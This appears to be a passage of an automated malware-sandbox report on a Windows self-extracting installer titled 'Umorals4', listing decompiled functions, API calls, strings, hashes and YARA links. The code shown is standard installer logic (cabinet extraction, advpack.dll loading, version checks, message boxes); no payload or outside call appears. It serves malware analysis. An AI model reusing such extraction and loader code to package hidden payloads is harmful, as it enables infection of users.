API ID: Resource$FreeLocal$FindLoad$AllocDialogErrorIndirectLastMessageParamSizeofStringlstrcmp
String ID: <None>$LICENSE
API String ID: 660532738-383193767
Opcode ID: c2ca5c5165e4cb2b825b59b663efdf31120c84acd8162f03187263c8f357c700
Instruction ID: edff11c28c5d22f8b8932bfe1f84cb2386185d633c526536021a64273d6bddd9
Opcode Fuzzy Hash: c2ca5c5165e4cb2b825b59b663efdf31120c84acd8162f03187263c8f357c700
Instruction Fuzzy Hash: 25119671708209ABD7249B36AC09F177ABBEBC5731F10403DB546D2261DAFDD801BA21

Uniqueness

Uniqueness Score: -1.00%

Function 00F36F15, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00F36F15(void* __ebx, void* _a4, int _a8, void* _a12, int _a16) {
				void* __edi;
				void* __esi;
				void* _t7;
				void* _t8;
				void _t9;
				void* _t15;
				void* _t17;
				void* _t18;
				int _t19;
				void _t20;
				void _t21;

				_t19 = _a16;
				if(_t19 != 0) {
					_t7 = _a4;
					if(_t7 != 0) {
						_push(__ebx);
						_t15 = _a12;
						if(_t15 == 0 || _a8 < _t19) {
							_t8 = memset(_t7, 0, _a8);
							if(_t15 != 0) {
								if(_a8 >= _t19) {
									_t9 = 0x16;
									goto L13;
								}
								L00F36E44();
								_push(0x22);
								L11:
								_pop(_t20);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								 *_t8 = _t20;
								L00F36E4F(_t15, _t17, _t18, _t20, 0);
								_t9 = _t20;
								goto L13;
							}
							L00F36E44();
							_push(0x16);
							goto L11;
						} else {
							memcpy(_t7, _t15, _t19);
							_t9 = 0;
							L13:
							L14:
							return _t9;
						}
					}
					L00F36E44();
					_t21 = 0x16;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t7 = _t21;
					L00F36E4F(__ebx, _t17, _t18, _t21, 0);
					_t9 = _t21;
					goto L14;
				}
				return 0;
			}

0x00f36f1b
0x00f36f20
0x00f36f29
0x00f36f2f
0x00f36f4e
0x00f36f4f
0x00f36f54
0x00f36f71
0x00f36f7b
0x00f36f89
0x00f36fa8
0x00000000
0x00f36fa8
0x00f36f8b
0x00f36f90
0x00f36f92
0x00f36f92
0x00f36f93
0x00f36f94
0x00f36f95
0x00f36f96
0x00f36f97
0x00f36f98
0x00f36f9a
0x00f36fa2
0x00000000
0x00f36fa2
0x00f36f7d
0x00f36f82
0x00000000
0x00f36f5b
0x00f36f5e
0x00f36f66
0x00f36fa9
0x00f36faa
0x00000000
0x00f36faa
0x00f36f54
0x00f36f31
0x00f36f38
0x00f36f3b
0x00f36f3c
0x00f36f3d
0x00f36f3e
0x00f36f3f
0x00f36f40
0x00f36f42
0x00f36f4a
0x00000000
0x00f36f4a
0x00000000

APIs

_errno.MSVCRT ref: 00F36F31

Strings

Umorals4, xrefs: 00F36F4E

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno
String ID: Umorals4
API String ID: 2918714741-264535404
Opcode ID: 2968453ca2872e87b862ff43ad89350036689a3a2ec3368cd9c8daba3631ed0c
Instruction ID: b24d803e9bc11da3ce34bb943956cfe5bb323e89371716e7ed5c74961d5fe8dd
Opcode Fuzzy Hash: 2968453ca2872e87b862ff43ad89350036689a3a2ec3368cd9c8daba3631ed0c
Instruction Fuzzy Hash: 4901C077B04206BADE22AAB6EC42A6B375CDF94774F11C025F909CB101F575C810BAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3233C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F3233C(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00F364E7( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00F36C20(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00f3233c
0x00f32347
0x00f3234e
0x00f32353
0x00f32360
0x00f3236a
0x00f32379
0x00f32388
0x00f3239d
0x00f323a2
0x00f323af
0x00f323b1
0x00f323b1
0x00f323a2
0x00f323c8

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F32362
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F32388
_lopen.KERNEL32 ref: 00F32397
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00F323A8
_lclose.KERNEL32(00000000), ref: 00F323B1

Strings

wininit.ini, xrefs: 00F3236C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: bc893f648c7fbb9125e7327b31a41383423785fb4e812e69a6168b8c60c2e7bd
Instruction ID: 932a46b94a6389ab37fafb29df6af3cca959c0b297d3c3fa527bc46e1a5ea264
Opcode Fuzzy Hash: bc893f648c7fbb9125e7327b31a41383423785fb4e812e69a6168b8c60c2e7bd
Instruction Fuzzy Hash: E1017572A0011C6BC720AB66DC0DDEF7B6DEB55770F000155FD85D3290DE788D45DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F33587, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F33587(signed char __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				void* _v432;
				CHAR* _v436;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				CHAR* _t71;
				short _t72;
				CHAR* _t79;
				CHAR* _t82;
				signed int _t83;
				int _t86;
				CHAR* _t87;
				signed char _t88;
				void* _t92;
				CHAR* _t94;
				signed short _t97;
				signed int _t99;
				signed char _t101;
				CHAR* _t110;
				CHAR* _t111;
				intOrPtr* _t116;
				signed int _t118;
				signed int _t119;
				void* _t122;
				CHAR* _t124;
				int _t127;
				signed int _t128;

				_t66 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t66 ^ _t128;
				_v416.dwOSVersionInfoSize = 0x94;
				_t101 = __ecx;
				_t124 = 0;
				_v432 = __ecx;
				_t127 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t123 = _v416.dwMajorVersion;
					_t71 = _v416.dwPlatformId - 1;
					__eflags = _t71;
					if(_t71 == 0) {
						_t72 = 0;
						__eflags = 1;
						 *0xf381f8 = 1;
						 *0xf381c4 = 1;
						L14:
						 *0xf39a80 = _t72;
						L15:
						__eflags =  *0xf38954 - _t127; // 0x0
						if(__eflags != 0) {
							goto L61;
						}
						__eflags = _t101;
						if(_t101 == 0) {
							goto L61;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							_t101 = _t101 + 4;
							__eflags = _t101;
						} else {
							_t101 = _t101 + 0x40;
						}
						_v436 = _t101;
						_v420 = _t124;
						do {
							_t123 = _v416.dwMinorVersion;
							_t76 = _t124 * 0x18;
							_v424 = _t124 * 0x18;
							_v428 = E00F328FA(_t124 * 0x18, _v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t76 + _t101)),  *((intOrPtr*)(_t76 + _t101 + 4)));
							_t79 = E00F328FA(_v424, _v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t101 + 0xc)),  *((intOrPtr*)(_v424 + _t101 + 0x10)));
							_t110 = _v428;
							__eflags = _t110;
							if(_t110 < 0) {
								L36:
								__eflags = _t124 - 1;
								if(_t124 == 1) {
									L33:
									_t127 = 0x54c;
									L34:
									_v420 = _v420 & 0x00000000;
									_t101 = 0;
									_v428 = _v428 & 0x00000000;
									_t123 = _v432;
									__eflags = _t127 - 0x54d;
									if(_t127 != 0x54d) {
										_t111 = _v436;
									} else {
										_t111 =  *((intOrPtr*)(_t123 + 0x80)) + 0x84 + _t124 * 0x3c + _t123;
										_v420 =  &_v268;
									}
									__eflags = _t111;
									if(_t111 == 0) {
										_t124 = _v428;
									} else {
										_t88 = _t111[0x30];
										_t124 = _t111[0x34] + 0x84 + _t123;
										__eflags = _t88 & 0x00000001;
										if((_t88 & 0x00000001) == 0) {
											asm("sbb ebx, ebx");
											_t101 =  ~(_t88 & 2) & 0x00000101;
										} else {
											_t101 = 0x104;
										}
									}
									__eflags =  *0xf38958 & 0x00000001;
									if(( *0xf38958 & 0x00000001) != 0) {
										L59:
										_push(0);
										_push(0x30);
										_push(_v420);
										_push("Umorals4");
										goto L60;
									} else {
										__eflags =  *_t124;
										if( *_t124 == 0) {
											goto L59;
										}
										MessageBeep(0);
										_t82 = E00F3671D(_t101, _t123);
										__eflags = _t82;
										if(_t82 == 0) {
											L52:
											_t83 = 0;
											__eflags = 0;
											L53:
											_t86 = MessageBoxA(0, _t124, "Umorals4", _t83 | _t101 | 0x00000030);
											__eflags = _t101 & 0x00000004;
											if((_t101 & 0x00000004) == 0) {
												__eflags = _t101 & 0x00000001;
												if((_t101 & 0x00000001) == 0) {
													goto L61;
												}
												__eflags = _t86 - 1;
												L57:
												if(__eflags == 0) {
													_t127 = 0;
												}
												goto L61;
											}
											__eflags = _t86 - 6;
											goto L57;
										}
										_t87 = E00F366C2(_t111, _t111);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L52;
										}
										_t83 = 0x180000;
										goto L53;
									}
								}
								goto L37;
							}
							__eflags = _t79;
							if(_t79 > 0) {
								goto L36;
							}
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t79;
								if(_t79 != 0) {
									break;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t101 + 0x14));
								L31:
								if(__eflags <= 0) {
									break;
								}
								L32:
								__eflags = _t124;
								if(_t124 == 0) {
									goto L37;
								}
								goto L33;
							}
							__eflags = _t79;
							_t97 = _v416.dwBuildNumber;
							if(_t79 != 0) {
								_t118 = _v424;
								__eflags = (_t97 & 0x0000ffff) -  *((intOrPtr*)(_t118 + _t101 + 8));
								if((_t97 & 0x0000ffff) >=  *((intOrPtr*)(_t118 + _t101 + 8))) {
									break;
								}
								goto L32;
							}
							_t119 = _t97 & 0x0000ffff;
							_t99 = _v424;
							__eflags = _t119 -  *((intOrPtr*)(_t99 + _t101 + 8));
							if(_t119 <  *((intOrPtr*)(_t99 + _t101 + 8))) {
								goto L32;
							}
							__eflags = _t119 -  *((intOrPtr*)(_t99 + _t101 + 0x14));
							goto L31;
							L37:
							_t124 =  &(_t124[1]);
							_t92 = 2;
							_v420 = _t124;
							__eflags = _t124 - _t92;
						} while (_t124 < _t92);
						_t116 = _v432;
						__eflags =  *((intOrPtr*)(_t116 + 0x7c)) - _t127;
						if( *((intOrPtr*)(_t116 + 0x7c)) == _t127) {
							goto L61;
						}
						_t123 =  &_v268;
						_t94 = E00F32755(_t116,  &_v268, _t116,  &_v420);
						__eflags = _t94;
						if(_t94 != 0) {
							goto L61;
						}
						_t124 = _v420;
						_t127 = 0x54d;
						goto L34;
					}
					__eflags = _t71 == 1;
					if(_t71 == 1) {
						 *0xf381f8 = 1;
						 *0xf381c4 = 1;
						_t72 = 2;
						 *0xf39a80 = _t72;
						__eflags = _t123 - 3;
						if(_t123 > 3) {
							__eflags = _t123 - 5;
							if(_t123 < 5) {
								goto L15;
							}
							_t72 = 3;
							goto L14;
						}
						_t72 = 1;
						_t122 = 3;
						 *0xf39a80 = 1;
						__eflags = _t123 - _t122;
						if(__eflags < 0) {
							L10:
							 *0xf381f8 = _t124;
							 *0xf381c4 = _t124;
							goto L15;
						}
						if(__eflags != 0) {
							goto L15;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L15;
						}
						goto L10;
					}
					_t127 = 0x4ca;
					goto L5;
				} else {
					_t127 = 0x4b4;
					L5:
					_push(_t124);
					_push(0x10);
					_push(_t124);
					_push(_t124);
					L60:
					_t123 = _t127;
					E00F34327(0, _t127);
					L61:
					return E00F36C20(0 | _t127 == 0x00000000, _t101, _v8 ^ _t128, _t123, _t124, _t127);
				}
			}

0x00f33592
0x00f33599
0x00f335a5
0x00f335af
0x00f335b1
0x00f335b4
0x00f335ba
0x00f335c4
0x00f335d3
0x00f335d9
0x00f335d9
0x00f335da
0x00f3363f
0x00f33641
0x00f33642
0x00f33648
0x00f3364e
0x00f3364e
0x00f33654
0x00f33654
0x00f3365a
0x00000000
0x00000000
0x00f33660
0x00f33662
0x00000000
0x00000000
0x00f33668
0x00f3366b
0x00f33672
0x00f33672
0x00f3366d
0x00f3366d
0x00f3366d
0x00f33675
0x00f3367b
0x00f33681
0x00f33681
0x00f3368d
0x00f33690
0x00f336a2
0x00f336b6
0x00f336bb
0x00f336c1
0x00f336c3
0x00f33766
0x00f33766
0x00f33769
0x00f33722
0x00f33722
0x00f33727
0x00f33727
0x00f3372e
0x00f33730
0x00f33737
0x00f3373d
0x00f33743
0x00f337b7
0x00f33745
0x00f3375c
0x00f3375e
0x00f3375e
0x00f337bd
0x00f337bf
0x00f337eb
0x00f337c1
0x00f337c4
0x00f337cd
0x00f337cf
0x00f337d1
0x00f337e1
0x00f337e3
0x00f337d3
0x00f337d3
0x00f337d3
0x00f337d1
0x00f337f1
0x00f337f8
0x00f3384f
0x00f3384f
0x00f33851
0x00f33853
0x00f33859
0x00000000
0x00f337fa
0x00f337fa
0x00f337fd
0x00000000
0x00000000
0x00f33801
0x00f33807
0x00f3380c
0x00f3380e
0x00f33821
0x00f33821
0x00f33821
0x00f33823
0x00f33831
0x00f33837
0x00f3383a
0x00f33841
0x00f33844
0x00000000
0x00000000
0x00f33846
0x00f33849
0x00f33849
0x00f3384b
0x00f3384b
0x00000000
0x00f33849
0x00f3383c
0x00000000
0x00f3383c
0x00f33811
0x00f33816
0x00f33818
0x00000000
0x00000000
0x00f3381a
0x00000000
0x00f3381a
0x00f337f8
0x00000000
0x00f33769
0x00f336c9
0x00f336cb
0x00000000
0x00000000
0x00f336d1
0x00f336d3
0x00f33705
0x00f33707
0x00000000
0x00000000
0x00f33718
0x00f3371c
0x00f3371c
0x00000000
0x00000000
0x00f3371e
0x00f3371e
0x00f33720
0x00000000
0x00000000
0x00000000
0x00f33720
0x00f336d5
0x00f336d7
0x00f336dd
0x00f336f4
0x00f336fd
0x00f33701
0x00000000
0x00000000
0x00000000
0x00f33703
0x00f336df
0x00f336e2
0x00f336e8
0x00f336ec
0x00000000
0x00000000
0x00f336ee
0x00000000
0x00f3376b
0x00f3376d
0x00f3376e
0x00f3376f
0x00f33775
0x00f33775
0x00f3377d
0x00f33783
0x00f33786
0x00000000
0x00000000
0x00f33794
0x00f3379a
0x00f3379f
0x00f337a1
0x00000000
0x00000000
0x00f337a7
0x00f337ad
0x00000000
0x00f337ad
0x00f335dc
0x00f335dd
0x00f335f1
0x00f335f7
0x00f335ff
0x00f33600
0x00f33606
0x00f33609
0x00f33633
0x00f33636
0x00000000
0x00000000
0x00f3363a
0x00000000
0x00f3363a
0x00f3360b
0x00f3360f
0x00f33610
0x00f33616
0x00f33618
0x00f33625
0x00f33625
0x00f3362b
0x00000000
0x00f3362b
0x00f3361a
0x00000000
0x00000000
0x00f3361c
0x00f33623
0x00000000
0x00000000
0x00000000
0x00f33623
0x00f335df
0x00000000
0x00f335c6
0x00f335c6
0x00f335e4
0x00f335e4
0x00f335e5
0x00f335e7
0x00f335e8
0x00f3385e
0x00f3385e
0x00f33862
0x00f33867
0x00f3387e
0x00f3387e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F335BC
MessageBeep.USER32(00000000), ref: 00F33801
MessageBoxA.USER32 ref: 00F33831

Strings

Umorals4, xrefs: 00F33829, 00F33859
3, xrefs: 00F3361C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$BeepVersion
String ID: 3$Umorals4
API String ID: 2519184315-3585417447
Opcode ID: 8e3603007be71155c34e77d07ac7397de2ebec5cabeba965c945f89e5134ae4d
Instruction ID: da769c569a6f03c4578a01e2a8ff6a991534a6e5275fb4e551ee64e0cc7c7d5d
Opcode Fuzzy Hash: 8e3603007be71155c34e77d07ac7397de2ebec5cabeba965c945f89e5134ae4d
Instruction Fuzzy Hash: 8E81D2B2E052249FEB24CB15CC91BA9B3B1AB45334F1500A9E94AD7290C7749F81FF41

Uniqueness

Uniqueness Score: -1.00%

Function 00F34DA8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00F34DA8(void* __ebx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void _v32;
				char _v44;
				void* __edi;
				void* __esi;
				signed int _t10;
				signed int _t14;
				void* _t17;
				signed int _t19;
				void* _t21;
				signed int _t22;
				void* _t28;
				signed int _t31;
				void* _t32;
				void* _t33;
				signed int _t34;
				void* _t43;

				_t28 = __edx;
				_t21 = __ebx;
				_t10 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t10 ^ _t34;
				_t22 = 6;
				memset( &_v32, 0, _t22 << 2);
				_t14 =  &_v44;
				__imp__#20(E00F34BA0, E00F34BC0, E00F34860, E00F34940, E00F349C0, E00F34A60, E00F34AC0, 1, _t14);
				_t31 = _t14;
				if(_t31 != 0) {
					_push(_t32);
					_push(0x180);
					_t33 = E00F34860("*MEMCAB", 0x8000);
					if(_t33 == 0xffffffff) {
						L8:
						_t14 = 0;
					} else {
						_t17 =  &_v32;
						__imp__#21(_t31, _t33, _t17);
						if(_t17 == 0) {
							goto L8;
						} else {
							_t43 = _v32 -  *0xf39184; // 0xf062
							if(_t43 != 0 || _v16 != 0 || _v12 != 0) {
								goto L8;
							} else {
								_t19 = E00F34A60(_t33);
								if(_t19 == 0xffffffff) {
									goto L8;
								} else {
									__imp__#23(_t31);
									asm("sbb eax, eax");
									_t14 =  ~( ~_t19);
								}
							}
						}
					}
					_pop(_t32);
				}
				return E00F36C20(_t14, _t21, _v8 ^ _t34, _t28, _t31, _t32);
			}

0x00f34da8
0x00f34da8
0x00f34db0
0x00f34db7
0x00f34dbd
0x00f34dc3
0x00f34dc5
0x00f34dee
0x00f34df4
0x00f34dfb
0x00f34dfd
0x00f34dfe
0x00f34e12
0x00f34e1a
0x00f34e62
0x00f34e62
0x00f34e1c
0x00f34e1c
0x00f34e22
0x00f34e2d
0x00000000
0x00f34e2f
0x00f34e32
0x00f34e38
0x00000000
0x00f34e46
0x00f34e47
0x00f34e50
0x00000000
0x00f34e52
0x00f34e53
0x00f34e5c
0x00f34e5e
0x00f34e5e
0x00f34e50
0x00f34e38
0x00f34e2d
0x00f34e64
0x00f34e64
0x00f34e73

APIs

#20.CABINET(00F34BA0,00F34BC0,00F34860,00F34940,00F349C0,00F34A60,00F34AC0,00000001,?,00000000), ref: 00F34DEE
#21.CABINET(00000000,00000000,?,?,?,CABINET), ref: 00F34E22
#23.CABINET(00000000), ref: 00F34E53

Strings

CABINET, xrefs: 00F34DFD
*MEMCAB, xrefs: 00F34E08

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: *MEMCAB$CABINET
API String ID: 0-2642027498
Opcode ID: 89cb826632ee2185b32b246d046bed03786d8867d26b3ee09d5d9ab0bdaefa57
Instruction ID: 4644f819ea4bce7943167c296c628fc8ea1503f84ea9edaa90c68fef823cc1fc
Opcode Fuzzy Hash: 89cb826632ee2185b32b246d046bed03786d8867d26b3ee09d5d9ab0bdaefa57
Instruction Fuzzy Hash: 8B11D331E442087ACB14EBA5AC46FAF73A5EB80B30F104215F911A61C0DBBCF986B656

Uniqueness

Uniqueness Score: -1.00%

Function 00F3635A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F3635A(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00F3158C( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E00F364E7( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00F36C20(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00f3635a
0x00f3635a
0x00f36365
0x00f3636c
0x00f36370
0x00f36382
0x00f36387
0x00f36398
0x00f363a4
0x00f363ad
0x00f363c7
0x00f363b3
0x00f363be
0x00f363be
0x00f363db

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363A4
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363BE
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00F363C7

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F36371
advpack.dll, xrefs: 00F36387, 00F36392, 00F363C6

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-258089097
Opcode ID: d21954d638a06de50059191cac572c6c20b1dc0c4cf55081c9d0ac03397fe94f
Instruction ID: 596a35d4f54e97cf1c062ff764eccb87cbd1f107d397cdbfa5be361ecabf18a2
Opcode Fuzzy Hash: d21954d638a06de50059191cac572c6c20b1dc0c4cf55081c9d0ac03397fe94f
Instruction Fuzzy Hash: C3012170A00108ABC714EB60DC49EEA7379EB95330F404199F5C4D2290CFB49D8AAA11

Uniqueness

Uniqueness Score: -1.00%

Function 00F33FC9, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00F33FC9() {
				int _t18;
				void* _t21;

				_t20 = E00F34538("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00F34538("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00F34327(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00f33fdd
0x00f33fef
0x00f33ff3
0x00f34017
0x00f34033
0x00f34046
0x00000000
0x00f34047
0x00f34035
0x00f34036
0x00f34038
0x00f34039
0x00f3403a
0x00f3403f
0x00f34041
0x00000000
0x00f34041
0x00f34019
0x00f3401a
0x00f3401c
0x00f3401d
0x00f3401e
0x00000000
0x00f3401e
0x00000000

APIs

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F32F3A), ref: 00F33FE9
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F32F3A), ref: 00F34047

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Strings

<None>, xrefs: 00F34025
FINISHMSG, xrefs: 00F33FD3, 00F3400B

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalResource$AllocFindFreeLoadMessageSizeofString
String ID: <None>$FINISHMSG
API String ID: 124676843-3091758298
Opcode ID: c33ffac4d61f1c0502829c2f063ccb0c6e115c098c8e850b0bf0207b7897bc4f
Instruction ID: 6a149fc9db10599a46c2030fa13403e254a1a9d94a375196c910f341a5c24c15
Opcode Fuzzy Hash: c33ffac4d61f1c0502829c2f063ccb0c6e115c098c8e850b0bf0207b7897bc4f
Instruction Fuzzy Hash: BE0181E27002187BF33816669C86F7B714EEB857B5F514029B746E2291DA6CFC017176

Uniqueness

Uniqueness Score: -1.00%

Function 00F31800, Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F31800(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00F34239(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xf39164, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00F36C20(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00f31800
0x00f31800
0x00f3180b
0x00f31812
0x00f31819
0x00f3181c
0x00f31821
0x00f31848
0x00f3184c
0x00f3185c
0x00f3186d
0x00f31880
0x00f31888
0x00000000
0x00f31823
0x00f31824
0x00f3183e
0x00f3183e
0x00f31826
0x00f31826
0x00f31832
0x00000000
0x00f31834
0x00f31836
0x00f3188e
0x00f31890
0x00f31890
0x00f31832
0x00f31824
0x00f3189f

APIs

EndDialog.USER32(?,?), ref: 00F31836
GetDesktopWindow.USER32 ref: 00F31842
LoadStringA.USER32 ref: 00F3186D
SetDlgItemTextA.USER32 ref: 00F31880
MessageBeep.USER32(000000FF), ref: 00F31888

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 582974e86ae2fd03bab8e680a7d41178196d5c72059f7a305892923ba048c2f6
Instruction ID: bb3a90f42d6d7887799f2993180a4750d384f959c3993cc05181be4ce4f62c60
